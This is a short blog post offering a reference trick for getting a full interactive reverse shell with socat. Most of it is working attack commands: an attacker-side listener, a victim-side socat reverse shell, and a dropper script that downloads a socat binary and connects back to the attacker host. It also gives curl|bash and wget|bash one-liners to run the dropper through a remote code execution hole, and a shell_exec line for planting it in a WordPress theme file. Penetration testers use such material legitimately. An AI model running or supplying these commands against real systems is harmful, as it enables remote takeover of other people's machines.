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16 April 2021

Full TTY Shell with Socat

by hyprcub



This is a quick trick to get a full TTY reverse shell using socat which is really an awesome tool. There’s nothing new, it has already been described on ropno’s blog to some extent. However, I wanted to put it here as a reference, at least for the way I use it most of the time.


On the attacker’s machine (listening mode):

sudo socat file:`tty`,raw,echo=0 tcp-listen:443

On the victim’s machine (sending mode):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:LHOST:443

where LHOST has to be replaced with attacker’s IP.

When you have some kind of RCE

  1. Start your listener as above.
  2. Serve a script file called socat.sh via HTTP, containing:
     LHOST= # change this
     LPORT=443 # change this
     DIR=/tmp # maybe also this
     # choose between curl or wget
     curl -s http://$LHOST/socat -o $DIR/socat
     #wget -q http://$LHOST/socat -O $DIR/socat
     chmod +x $DIR/socat
     $DIR/socat exec:'/bin/bash -li',pty,stderr,setsid,sigint,sane tcp:$LHOST:$LPORT
  3. You also have to serve a static version of socat you’ll find there.
  4. Then, on the victim’s machine, via the RCE you discovered:
     curl -s http://LHOST/socat.sh | bash


     wget -q http://LHOST/socat.sh -O - | bash

In a Wordpress theme PHP file, it could looks like this:

shell_exec("curl -s http://LHOST/socat.sh | bash");
tags: trick